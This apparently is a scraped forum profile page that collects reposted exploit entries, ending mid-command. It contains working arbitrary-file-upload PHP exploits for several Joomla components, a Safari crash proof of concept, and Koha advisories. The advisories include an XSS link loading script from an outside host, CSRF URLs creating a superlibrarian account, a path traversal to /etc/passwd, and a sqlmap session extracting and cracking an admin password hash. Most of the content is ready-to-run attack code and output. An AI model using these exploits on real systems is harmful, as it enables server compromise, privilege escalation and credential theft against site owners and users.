HireHackking
Members
-
Joined
-
Last visited
Everything posted by HireHackking
-
source: https://www.securityfocus.com/bid/53969/info The Art Uploader component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately sanitize user-supplied input. An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. Art Uploader 1.0.1 is vulnerable; other versions may also be affected. <?php $uploadfile="lo.php"; $ch = curl_init("http://www.example.com/modules/mod_artuploader/upload.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('userfile'=>"@$uploadfile", 'path'=>'./')); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> Shell Access : http://www.example.com/modules/mod_artuploader/lo.php lo.php <?php phpinfo(); ?> -
source: https://www.securityfocus.com/bid/53968/info The Simple SWFUpload component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately sanitize user-supplied input. An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. Simple SWFUpload 2.0 is vulnerable;other versions may also be affected. <?php $uploadfile="lo.php.gif"; $ch = curl_init("http://www.exemple.com/administrator/components/com_simpleswfupload/uploadhandler.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> Shell Access : http://www.exemple.com/images/stories/lo.php.gif lo.php.gif <?php phpinfo(); ?>
-
source: https://www.securityfocus.com/bid/53972/info The DentroVideo component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input. An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. DentroVideo 1.2 is vulnerable; other versions may also be affected. Exploit 1 : PostShell.php <?php $uploadfile="lo.php"; $ch = curl_init("http://www.example.com/components/com_dv/externals/phpupload/upload.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('file1'=>"@$uploadfile", 'action'=>'upload')); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> Shell Access : http://www.example.com/lo.php lo.php <?php phpinfo(); ?> Exploit 2 : PostShell2.php <?php $uploadfile="lo.php.mpg3"; $ch = curl_init("http://www.example.com/components/com_dv/externals/swfupload/upload.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> Shell Access : http://www.example.com/dvvideos/uploads/originals/lo.php.mpg3 lo.php.mpg3 <?php phpinfo(); ?>
-
source: https://www.securityfocus.com/bid/53973/info The IDoEditor component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately sanitize user-supplied input. An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. IDoEditor 1.6.16 is vulnerable; other versions may also be affected. <html> <body> <center> <form action="http://www.example.com/plugins/editors/idoeditor/themes/advanced/php/image.php" method="post" enctype="multipart/form-data"> <input type="file" name="pfile"> <input type="submit" name="Submit" value="Upload"> </form> </center> </body> </html>
-
source: https://www.securityfocus.com/bid/53975/info The jFancy component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately sanitize user-supplied input. An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. jFancy 2.03 is vulnerable; other versions may also be affected. Exploit : PostShell.php <?php $uploadfile="lo.php.gif"; $ch = curl_init("http://www.example.com/modules/mod_jfancy/script.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('photoupload'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> Shell Access : http://www.example.com/images/lo.php.gif lo.php.gif <?php phpinfo(); ?>
-
#!/usr/bin/php <?php # Title : Safari 8.0.X / OS X Yosemite 10.10.3 Crash Proof Of Concept # Product Website: https://www.apple.com/safari/ # Author : Mohammad Reza Espargham # Linkedin : https://ir.linkedin.com/in/rezasp # E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com # Website : www.reza.es # Twitter : https://twitter.com/rezesp # FaceBook : https://www.facebook.com/mohammadreza.espargham # Usage : # php poc.php # Open Safari and open ip:8080 / 127.0.0.1:8080 # Crashed ;) #Main POC Code $reza = socket_create(AF_INET, SOCK_STREAM, 0) or die('Failed to create socket!'); socket_bind($reza, 0,8080); socket_listen($reza); print "\nNow Open Safari and open ip:8080 / 127.0.0.1:8080\n\n"; $msg = 'PGh0bWw+CjxzdHlsZT4Kc3ZnIHsKICAgIHBhZGRpbmctdG9wOiAxMzk0JTsKICAgIGJveC1zaXppbmc6IGJvcmRlci1ib3g7Cn0KPC9zdHlsZT4KPHN2ZyB2aWV3Qm94PSIxIDIgNTAwIDUwMCIgd2lkdGg9IjkwMCIgaGVpZ2h0PSI5MDAiPgo8cG9seWxpbmUgcG9pbnRzPSIxIDEsMiAyIj48L3BvbHlsaW5lPgo8L3N2Zz4KPC9odG1sPg=='; $msgd=base64_decode($msg); for (;;) { if ($client = @socket_accept($reza)) { socket_write($client, "HTTP/1.1 200 OK\r\n" . "Content-length: " . strlen($msgd) . "\r\n" . "Content-Type: text/html; charset=UTF-8\r\n\r\n" . $msgd); } else usleep(100000); } #Crash Report /* Process Model: Multiple Web Processes Thread 0 Crashed:: Dispatch queue: com.apple.main-thread 0 libsystem_kernel.dylib 0x00007fff8e628286 __pthread_kill + 10 1 libsystem_c.dylib 0x00007fff90619b53 abort + 129 2 libsystem_c.dylib 0x00007fff905e1c39 __assert_rtn + 321 3 com.apple.CoreGraphics 0x00007fff87716e4e CGPathCreateMutableCopyByTransformingPath + 242 4 com.apple.CoreGraphics 0x00007fff8773aff0 CGContextAddPath + 93 5 com.apple.WebCore 0x0000000104ea8c84 WebCore::GraphicsContext::fillPath(WebCore::Path const&) + 148 6 com.apple.WebCore 0x000000010597e851 WebCore::RenderSVGResourceSolidColor::postApplyResource(WebCore::RenderElement&, WebCore::GraphicsContext*&, unsigned short, WebCore::Path const*, WebCore::RenderSVGShape const*) + 65 7 com.apple.WebCore 0x000000010597f08a WebCore::RenderSVGShape::fillShape(WebCore::RenderStyle const&, WebCore::GraphicsContext*) + 122 8 com.apple.WebCore 0x000000010597f3c3 WebCore::RenderSVGShape::fillStrokeMarkers(WebCore::PaintInfo&) + 131 9 com.apple.WebCore 0x0000000104fa73cb WebCore::RenderSVGShape::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 379 10 com.apple.WebCore 0x0000000104fa7062 WebCore::RenderSVGRoot::paintReplaced(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 1330 11 com.apple.WebCore 0x0000000104f1ee72 WebCore::RenderReplaced::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 722 12 com.apple.WebCore 0x0000000105429e88 WebCore::InlineElementBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::LayoutUnit, WebCore::LayoutUnit) + 312 13 com.apple.WebCore 0x0000000104ea4a63 WebCore::InlineFlowBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::LayoutUnit, WebCore::LayoutUnit) + 1251 14 com.apple.WebCore 0x0000000104ea4509 WebCore::RootInlineBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::LayoutUnit, WebCore::LayoutUnit) + 89 15 com.apple.WebCore 0x0000000104e53d96 WebCore::RenderLineBoxList::paint(WebCore::RenderBoxModelObject*, WebCore::PaintInfo&, WebCore::LayoutPoint const&) const + 694 16 com.apple.WebCore 0x0000000104e51373 WebCore::RenderBlock::paintContents(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 67 17 com.apple.WebCore 0x0000000104e50724 WebCore::RenderBlock::paintObject(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 420 18 com.apple.WebCore 0x0000000104e529af WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 287 19 com.apple.WebCore 0x00000001058db139 WebCore::RenderBlock::paintChild(WebCore::RenderBox&, WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool) + 393 20 com.apple.WebCore 0x0000000104e51478 WebCore::RenderBlock::paintChildren(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool) + 72 21 com.apple.WebCore 0x0000000104e51420 WebCore::RenderBlock::paintContents(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 240 22 com.apple.WebCore 0x0000000104e50724 WebCore::RenderBlock::paintObject(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 420 23 com.apple.WebCore 0x0000000104e529af WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 287 24 com.apple.WebCore 0x0000000104e512b2 WebCore::RenderLayer::paintForegroundForFragmentsWithPhase(WebCore::PaintPhase, WTF::Vector<WebCore::LayerFragment, 1ul, WTF::CrashOnOverflow> const&, WebCore::GraphicsContext*, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int, WebCore::RenderObject*) + 370 25 com.apple.WebCore 0x0000000104e50f87 WebCore::RenderLayer::paintForegroundForFragments(WTF::Vector<WebCore::LayerFragment, 1ul, WTF::CrashOnOverflow> const&, WebCore::GraphicsContext*, WebCore::GraphicsContext*, WebCore::LayoutRect const&, bool, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int, WebCore::RenderObject*, bool, bool) + 423 26 com.apple.WebCore 0x0000000104e4fc30 WebCore::RenderLayer::paintLayerContents(WebCore::GraphicsContext*, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 2576 27 com.apple.WebCore 0x0000000104e4f002 WebCore::RenderLayer::paintLayer(WebCore::GraphicsContext*, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 1010 28 com.apple.WebCore 0x0000000104e4fd62 WebCore::RenderLayer::paintLayerContents(WebCore::GraphicsContext*, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 2882 29 com.apple.WebCore 0x0000000104e7ac36 WebCore::RenderLayerBacking::paintIntoLayer(WebCore::GraphicsLayer const*, WebCore::GraphicsContext*, WebCore::IntRect const&, unsigned int, unsigned int) + 358 30 com.apple.WebCore 0x000000010593757f WebCore::RenderLayerBacking::paintContents(WebCore::GraphicsLayer const*, WebCore::GraphicsContext&, unsigned int, WebCore::FloatRect const&) + 799 31 com.apple.WebCore 0x000000010537dd44 WebCore::GraphicsLayer::paintGraphicsLayerContents(WebCore::GraphicsContext&, WebCore::FloatRect const&) + 132 32 com.apple.WebCore 0x00000001058b6ad9 WebCore::PlatformCALayer::drawLayerContents(CGContext*, WebCore::PlatformCALayer*, WTF::Vector<WebCore::FloatRect, 5ul, WTF::CrashOnOverflow>&) + 361 33 com.apple.WebCore 0x0000000105b170a7 WebCore::TileGrid::platformCALayerPaintContents(WebCore::PlatformCALayer*, WebCore::GraphicsContext&, WebCore::FloatRect const&) + 167 34 com.apple.WebCore 0x0000000105ba36cc -[WebSimpleLayer drawInContext:] + 172 35 com.apple.QuartzCore 0x00007fff8d7033c7 CABackingStoreUpdate_ + 3306 36 com.apple.QuartzCore 0x00007fff8d7026d7 ___ZN2CA5Layer8display_Ev_block_invoke + 59 37 com.apple.QuartzCore 0x00007fff8d702694 x_blame_allocations + 81 38 com.apple.QuartzCore 0x00007fff8d6f643c CA::Layer::display_() + 1546 39 com.apple.WebCore 0x0000000105ba35eb -[WebSimpleLayer display] + 43 40 com.apple.QuartzCore 0x00007fff8d6f47fd CA::Layer::display_if_needed(CA::Transaction*) + 603 41 com.apple.QuartzCore 0x00007fff8d6f3e81 CA::Layer::layout_and_display_if_needed(CA::Transaction*) + 35 42 com.apple.QuartzCore 0x00007fff8d6f3612 CA::Context::commit_transaction(CA::Transaction*) + 242 43 com.apple.QuartzCore 0x00007fff8d6f33ae CA::Transaction::commit() + 390 44 com.apple.QuartzCore 0x00007fff8d701f19 CA::Transaction::observer_callback(__CFRunLoopObserver*, unsigned long, void*) + 71 45 com.apple.CoreFoundation 0x00007fff869f7127 __CFRUNLOOP_IS_CALLING_OUT_TO_AN_OBSERVER_CALLBACK_FUNCTION__ + 23 46 com.apple.CoreFoundation 0x00007fff869f7080 __CFRunLoopDoObservers + 368 47 com.apple.CoreFoundation 0x00007fff869e8bf8 CFRunLoopRunSpecific + 328 48 com.apple.HIToolbox 0x00007fff8df1156f RunCurrentEventLoopInMode + 235 49 com.apple.HIToolbox 0x00007fff8df112ea ReceiveNextEventCommon + 431 50 com.apple.HIToolbox 0x00007fff8df1112b _BlockUntilNextEventMatchingListInModeWithFilter + 71 51 com.apple.AppKit 0x00007fff8ebe59bb _DPSNextEvent + 978 52 com.apple.AppKit 0x00007fff8ebe4f68 -[NSApplication nextEventMatchingMask:untilDate:inMode:dequeue:] + 346 53 com.apple.AppKit 0x00007fff8ebdabf3 -[NSApplication run] + 594 54 com.apple.AppKit 0x00007fff8eb57354 NSApplicationMain + 1832 55 libxpc.dylib 0x00007fff8ab77958 _xpc_objc_main + 793 56 libxpc.dylib 0x00007fff8ab79060 xpc_main + 490 57 com.apple.WebKit.WebContent 0x0000000103f10b40 0x103f10000 + 2880 58 libdyld.dylib 0x00007fff873e45c9 start + 1 */ ?>
-
source: https://www.securityfocus.com/bid/53977/info The Easy Flash Uploader component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately sanitize user-supplied input. An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. Easy Flash Uploader 2.0 is vulnerable; other versions may also be affected. <?php $uploadfile="lo.php"; $ch = curl_init("http://www.example.com/plugins/content/efup_files/helper.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile", 'JPATH_BASE'=>'../../../', 'filesize'=>'2000', 'filetypes'=>'*.*', 'mimetypes'=>"*", 'destination'=>'./')); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?>
-
# Exploit Title: Koha Open Source ILS - Multiple XSS and XSRF Vulnerabilities # Google Dork: # Date: 25/06/2015 # Exploit Author: Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos - Combinatorial Security Testing Group of SBA Research (cst@sba-research.org) # Vendor Homepage: koha-community.org # Software Link: https://github.com/Koha-Community/Koha # Version: 3.20.x <= 3.20.1, 3.18.x <= 3.18.8, 3.16.x <= 3.16.12 # Tested on: Debian Linux # CVE : CVE-2015-4630, CVE-2015-4631 ### CVE-2015-4631 ### #### Titel: #### Multiple XSS and XSRF vulnerabilities in Koha #### Type of vulnerability: #### Koha suffers from multiple critical XSS and XSRF vulnerabilities ##### Exploitation vector: The attack can be performed through a compromised user account (for example previous password retrieval if student user acoount through SQLI - CVE-2015-4633) or due to user that clicks on a malicious link (for example in a phishing mail, forum link etc) ##### Attack outcome: 1. An attacker may escalate privileges and even gain superlibrarian permissions. 2. An attacker may target other users by stealing session tokens, impersonating them or exploiting browser vulnerabilities to gain access on their machines. 3. Perform unauthorized actions with the permissions of a staff member 4. Exploit other known server-side vulnerabilities (see CVE-2015-4633 and CVE-2015-4632) to fully compromise the websever #### Impact: #### {low,medium,high,critical} critical #### Software/Product name: #### Koha #### Affected versions: #### * <= Koha 3.20.1 * <= Koha 3.18.8 * <= Koha 3.16.12 #### Fixed in version: #### * version 3.20.1 http://koha-community.org/security-release-koha-3-20-1/, * version 3.18.8 http://koha-community.org/security-release-koha-3-18-8/, * version 3.16.12 http://koha-community.org/security-release-koha-3-16-12/ #### Vendor: #### http://koha-community.org/ (Open Source) #### CVE number: #### CVE-2015-4631 #### Timeline #### * `2015-06-18` identification of vulnerability * `2015-06-18` 1st contact to release maintainer, immediate reply * `2015-06-23` new release with fixed vulnerabilities #### Credits: #### RGhanad-Tavakoli@sba-research.org --- Vulnerability Disclosure by Combinatorial Security Testing Group of SBA Research. Contact: cst@sba-research.org #### References: http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416 http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423 http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418 http://koha-community.org/security-release-koha-3-20-1/ http://koha-community.org/security-release-koha-3-18-8/ http://koha-community.org/security-release-koha-3-16-12/ #### Description: #### Koha suffers from various critical XSS and XSRF vulnerabilities due to imprope input validation. The site also lacks in the implementation of challenge tokens that prevent cross-site forgery (XSRF) attacks. This allows remote remote attackers to inject arbitrary web script or HTML and completely compromise the webpage. The following pages are affected from stored XSS flaws: /cgi-bin/koha/opac-shelves.pl /cgi-bin/koha/virtualshelves/shelves.pl The following pages are affected from relfective XSS flaws: /cgi-bin/koha/opac-shelves.pl (parameters: "direction", "display") /cgi-bin/koha/opac-search.pl (parameters: "tag") /cgi-bin/koha/authorities/authorities-home.pl (parameters: "value") /cgi-bin/koha/acqui/lateorders.pl (parameters: "delay") /cgi-bin/koha/admin/auth_subfields_structure.pl (parameters: "authtypecode","tagfield") /cgi-bin/koha/admin/marc_subfields_structure.pl (parameters: "tagfield") /cgi-bin/koha/catalogue/search.pl (parameters: "limit") /cgi-bin/koha/serials/serials-search.pl (parameters: "bookseller_filter", "callnumber_filter", "EAN_filter", "ISSN_filter", "publisher_filter", "title_filter") /cgi-bin/koha/suggestion/suggestion.pl (parameters: "author", "collectiontitle", "copyrightdate", "isbn", "manageddate_from", "manageddate_to", "publishercode", "suggesteddate_from", "suggesteddate_to") #### Proof-of-concept: #### Attack scenario: Alice, a student with restricted permissions on the system, receives a phishing mail (or reads in some forum) and clicks the following link: http://<opac-interface>/cgi-bin/koha/opac-shelves.pl?shelves=1&addshelf=Malicious+Input+<script+src='http://cst.sba-research.org/x.js'/>&sortfield=title&category=2&allow_add=0&allow_delete_own=1&allow_delete_other=0 Bob, library admin, recognizes the new malicious list entry. He logs into the staff area and browses the public lists in order to delete the entry. Once he opens http://<staff-interface>/cgi-bin/koha/virtualshelves/shelves.pl the malcious code get's executed. The code can then perform any unauthorized actions with the pemissions of user bob. For example: Create new user: http://testbox:9002/cgi-bin/koha/members/memberentry.pl?nodouble=&destination=&check_member=&borrowernumber=&nodouble=&title=&firstname=&othernames=&sex=&streetnumber=&streettype=&address2=&city=&state=&zipcode=&country=&phone=&phonepro=&mobile=&email=&emailpro=&fax=&B_address=&B_address2=&B_city=&B_state=&B_zipcode=&B_country=&B_phone=&B_email=&contactnote=&altcontactsurname=&altcontactfirstname=&altcontactaddress1=&altcontactaddress2=&altcontactaddress3=&altcontactstate=&altcontactzipcode=&altcontactcountry=&altcontactphone=&sort1=&sort2=&dateexpiry=&opacnote=&borrowernotes=&patron_attr_1=&BorrowerMandatoryField=surname%7Cdateofbirth%7Ccardnumber%7Caddress&category_type=A&updtype=I&op=insert&surname=hacker&dateofbirth=10%2F06%2F2000&address=fictional&select_city=%7C%7C%7C&cardnumber=9182734629182364&branchcode=MAURES&categorycode=P_COM&dateenrolled=24%2F06%2F2015&userid=hacker&password=hacker&password2=hacker&patron_attr_1_code=PROFESSION&setting_messaging_prefs=1&modify=yes&borrowernumber=&save=Save&setting_extended_patron_attributes=1 Give the new user superlibririan permission: http://testbox:9002/testbox:9002/cgi-bin/koha/members/member-flags.pl?member=7855&newflags=1&flag=superlibrarian The attacker can now log as superlibrarian. Side Note: In order to make the attack work, alice needs to be logged in to the Open Public Catalog interface at the time of when clicking the malicious link. Alice needs to have access to the OPAC interface and to have permissions to create public lists.
-
# Exploit Title: Koha Open Source ILS - Path Traversal in STAFF client # Google Dork: # Date: 25/06/2015 # Exploit Author: Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos - Combinatorial Security Testing Group of SBA Research (cst@sba-research.org) # Vendor Homepage: koha-community.org # Software Link: https://github.com/Koha-Community/Koha # Version: 3.20.x <= 3.20.1, 3.18.x <= 3.18.8, 3.16.x <= 3.16.12 # Tested on: Debian Linux # CVE : CVE-2015-4632 ### CVE-2015-4632 ### #### Titel: #### Directory traversal #### Type of vulnerability: #### File Path Traversal ##### Exploitation vector: Injecting into the "template_path" parmeter in /cgi-bin/koha/svc/members/search and /cgi-bin/koha/svc/members/search ##### Attack outcome: Read access to arbitrary files on the system #### Impact: #### {low,medium,high,critical} high #### Software/Product name: #### Koha #### Affected versions: #### * <= Koha 3.20.1 * <= Koha 3.18.8 * <= Koha 3.16.12 #### Fixed in version: #### * version 3.20.1 http://koha-community.org/security-release-koha-3-20-1/, * version 3.18.8 http://koha-community.org/security-release-koha-3-18-8/, * version 3.16.12 http://koha-community.org/security-release-koha-3-16-12/ #### Vendor: #### http://koha-community.org/ (Open Source) #### CVE number: #### CVE-2015-4632 #### Timeline #### * `2015-06-18` identification of vulnerability * `2015-06-18` 1st contact to release maintainer, immediate reply * `2015-06-23` new release with fixed vulnerabilities #### Credits: #### RGhanad-Tavakoli@sba-research.org --- Vulnerability Disclosure by Combinatorial Security Testing Group of SBA Research. Contact: cst@sba-research.org #### References: http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408 http://koha-community.org/security-release-koha-3-20-1/ http://koha-community.org/security-release-koha-3-18-8/ http://koha-community.org/security-release-koha-3-16-12/ #### Description: #### Multiple directory traversal vulnerabilities allow remote attackers to read arbitrary files via a .. (dot dot) in (1) /cgi-bin/koha/svc/virtualshelves/search and (2) in /cgi-bin/koha/svc/members/search #### Proof-of-concept: #### /cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd /cgi-bin/koha/svc/members/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
-
# Exploit Title: Koha Open Source ILS - Unauthenticated SQL Injection in OPAC # Google Dork: # Date: 25/06/2015 # Exploit Author: Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos - Combinatorial Security Testing Group of SBA Research (cst@sba-research.org) # Vendor Homepage: koha-community.org # Software Link: https://github.com/Koha-Community/Koha # Version: 3.20.x <= 3.20.1, 3.18.x <= 3.18.8, 3.16.x <= 3.16.12 # Tested on: Debian Linux # CVE : CVE-2015-4633 ### CVE-2015-4633 ### #### Titel: #### Unauthenticated SQL Injection in Koha #### Type of vulnerability: #### An Unauthenticated SQL Injection vulnerability in Koha allows attackers to read arbitrary data from the database. ##### Exploitation vector: The url parameter 'number' of the /cgi-bin/koha/opac-tags_subject.pl is vulnerable to SQLI. ##### Attack outcome: An attacker can read arbitrary data from the database. If the webserver is misconfigured, read & write access the filesystem may be possible. #### Impact: #### critical #### Software/Product name: #### Koha #### Affected versions: #### * <= Koha 3.20.1 * <= Koha 3.18.8 * <= Koha 3.16.12 #### Fixed in version: #### * version 3.20.1 http://koha-community.org/security-release-koha-3-20-1/, * version 3.18.8 http://koha-community.org/security-release-koha-3-18-8/, * version 3.16.12 http://koha-community.org/security-release-koha-3-16-12/ #### Vendor: #### http://koha-community.org/ (Open Source) #### CVE number: #### CVE-2015-4633 #### Timeline #### * `2015-06-18` identification of vulnerability * `2015-06-18` 1st contact to release maintainer, immediate reply * `2015-06-23` new release with fixed vulnerabilities #### Credits: #### RGhanad-Tavakoli@sba-research.org --- Vulnerability Disclosure by Combinatorial Security Testing Group of SBA Research. Contact: cst@sba-research.org #### References: http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412 http://koha-community.org/security-release-koha-3-20-1/ http://koha-community.org/security-release-koha-3-18-8/ http://koha-community.org/security-release-koha-3-16-12/ #### Description: #### By manipulating the variable 'number' of the /cgi-bin/koha/opac-tags_subject.pl script the database can be accessed via time-based blind injections. If the webserver is misconfigured, the file-system can be accessed as well. #### Proof-of-concept: #### 1. Inspect Koha database schema Have a look at how to query the database for superlibrarian users: http://wiki.koha-community.org/wiki/SQL_Reports_Library#Superlibrarians So basically we we need to execute some SQL statement like this: sql-shell> select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1; 2. Query the database with sqlmap So let's fire up sqlmap with the --sql-shell parameter and input the query: root@kali:/home/wicked# sqlmap -u http://testbox:9001/cgi-bin/koha/opac-tags_subject.pl?number=10 -p number --technique=T --dbms=MySQL --sql-shell --time-sec=4 _ ___ ___| |_____ ___ ___ {1.0-dev-nongit-20150513} |_ -| . | | | .'| . | |___|_ |_|_|_|_|__,| _| |_| |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 09:20:07 [09:20:07] [INFO] testing connection to the target URL sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Parameter: number (GET) Type: AND/OR time-based blind Title: MySQL >= 5.1 time-based blind - PROCEDURE ANALYSE (EXTRACTVALUE) Payload: number=1 PROCEDURE ANALYSE(EXTRACTVALUE(9743,CONCAT(0x5c,(BENCHMARK(4000000,MD5(0x4b754a4b))))),1) --- [09:20:09] [INFO] testing MySQL [09:20:09] [INFO] confirming MySQL [09:20:09] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian web application technology: Apache 2.4.10 back-end DBMS: MySQL >= 5.0.0 [09:20:09] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER sql-shell> select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1; [09:20:25] [INFO] fetching SQL SELECT statement query output: 'select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1' [09:20:25] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind [09:20:25] [WARNING] time-based comparison requires larger statistical model, please wait.............................. [09:20:52] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors admin [09:21:46] [INFO] retrieved: $2a$08$taQ [09:23:33] [ERROR] invalid character detected. retrying.. [09:23:33] [WARNING] increasing time delay to 5 seconds afOgEEhU [09:25:10] [ERROR] invalid character detected. retrying.. [09:25:10] [WARNING] increasing time delay to 6 seconds t/gW [09:26:13] [ERROR] invalid character detected. retrying.. [09:26:13] [WARNING] increasing time delay to 7 seconds TOmqnYe1Y6ZNxCENa [09:29:57] [ERROR] invalid character detected. retrying.. [09:29:57] [WARNING] increasing time delay to 8 seconds 2.ONk2eZhnuEw5z9OjjxS [09:35:08] [ERROR] invalid character detected. retrying.. [09:35:08] [WARNING] increasing time delay to 9 seconds select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;: 'admin, $2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS' 3. Feed john the ripper and be lucky root@kali:/home/wicked# echo "$2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS" > ./admin-pass root@kali:/home/wicked# john ./admin-pass Loaded 1 password hash (OpenBSD Blowfish [32/64 X2]) admin (?) guesses: 1 time: 0:00:00:10 DONE (Thu Jun 25 09:45:41 2015) c/s: 260 trying: Smokey - allstate Use the "--show" option to display all of the cracked passwords reliably root@kali:/home/wicked# john ./admin-pass --show ?:admin 1 password hash cracked, 0 left 4. Log in with username "admin" and password "admin" ;) ### CVE-2015-xxxx ### #### Titel: #### Unauthenticated SQL Injection #### Type of vulnerability: #### SQL Injection vulnerabilities in Koha staff client allows attackers to read arbitrary data from the database. ##### Exploitation vector: The url parameter 'number' of the /cgi-bin/koha/opac-tags_subject.pl is vulnerable to SQLI. ##### Attack outcome: An attacker can read arbitrary data from the database. If the webserver is misconfigured, read & write access to the filesystem is possible. #### Impact: #### critical #### Software/Product name: #### Koha #### Affected versions: #### * <= Koha 3.20.1 * <= Koha 3.18.8 * <= Koha 3.16.12 #### Fixed in version: #### * version 3.20.1 http://koha-community.org/security-release-koha-3-20-1/, * version 3.18.8 http://koha-community.org/security-release-koha-3-18-8/, * version 3.16.12 http://koha-community.org/security-release-koha-3-16-12/ #### Vendor: #### http://koha-community.org/ (Open Source) #### CVE number: #### CVE-2015-xxxx #### Timeline #### * `2015-06-18` identification of vulnerability * `2015-06-18` 1st contact to release maintainer, immediate reply * `2015-06-23` new release with fixed vulnerabilities #### Credits: #### RGhanad-Tavakoli@sba-research.org --- Vulnerability Disclosure by Combinatorial Security Testing Group of SBA Research. Contact: cst@sba-research.org #### References: http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426 http://koha-community.org/security-release-koha-3-20-1/ http://koha-community.org/security-release-koha-3-18-8/ http://koha-community.org/security-release-koha-3-16-12/ #### Description: #### By manipulating the variable 'number' of the /cgi-bin/koha/opac-tags_subject.pl script the database can be accessed via time-based blind injections. If the webserver is misconfigured, the file-system can be accessed as well. #### Proof-of-concept: #### echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 